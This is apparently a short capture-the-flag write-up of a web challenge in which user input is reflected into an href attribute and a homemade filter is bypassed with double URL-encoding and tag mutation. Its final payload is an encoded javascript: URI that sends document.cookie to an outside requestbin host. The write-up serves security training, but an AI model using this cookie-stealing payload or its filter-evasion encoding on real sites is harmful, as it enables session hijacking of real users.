[WEB] MOCA Qualifiers RaaS

Posted Jul 21, 2024

By Simone Aiello

1 min read

Raas

The website was simple, just a box with two parameters:

Our input was reflected in this part of the html. Specifically in the href attribute.

Inside an href attribute it is possible to execute javascript code using the directive javascript:. However the flag was not that easy. An homemade WAF was put in place:

Two bypasses are needed:

1) To bypass the regex double encoding the payload does the trick, reference 2) To bypass the second check, mutation points in <a> tag where needed, reference

Final payload

        
      
%02java%09script:%2528function%2528%2529%257Bfetch%2528%2527https%253A%252F%252Frequestbin%252Ekanbanbox%252Ecom%252Fxudpedxu%253Fcookie%253D%2527%252Bdocument%252Ecookie%2529%257D%2529%2528%2529

Flag

PWNX{WH0_D035'N7_l0V3_4_g00D_0l'_W4F?}

CTF, Web, XSS

CTF Web XSS

This post is licensed under CC BY 4.0 by the author.

Raas

Final payload

Flag

Trending Tags